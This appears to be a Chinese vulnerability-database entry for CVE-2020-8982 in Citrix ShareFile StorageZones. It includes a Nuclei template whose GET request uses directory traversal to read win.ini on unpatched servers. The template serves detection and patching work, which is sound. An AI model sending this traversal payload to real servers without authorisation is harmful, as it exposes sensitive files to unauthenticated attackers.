CVE-2020-8982: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Citrix ShareFile StorageZones | POC: 已公开

漏洞描述

Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.

PoC代码[已公开]

id: CVE-2020-8982

info:
  name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
  impact: |
    An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information.
  remediation: |
    Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability.
  reference:
    - https://support.citrix.com/article/CTX269106
    - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
    - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8982
    - https://github.com/0xT11/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-8982
    cwe-id: CWE-22
    epss-score: 0.7588
    epss-percentile: 0.98874
    cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: citrix
    product: sharefile_storagezones_controller
  tags: cve2020,cve,citrix,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b165fea7fb325b11f9762107e9f8fb5d2f304396be36f651a72e0efb013532d902203dc198a8d158866b2092d4d66538f60bbaedab37df2e0549fa9386cabc3b6696:922c64590222798bb761d5b6d8e72950

相关漏洞推荐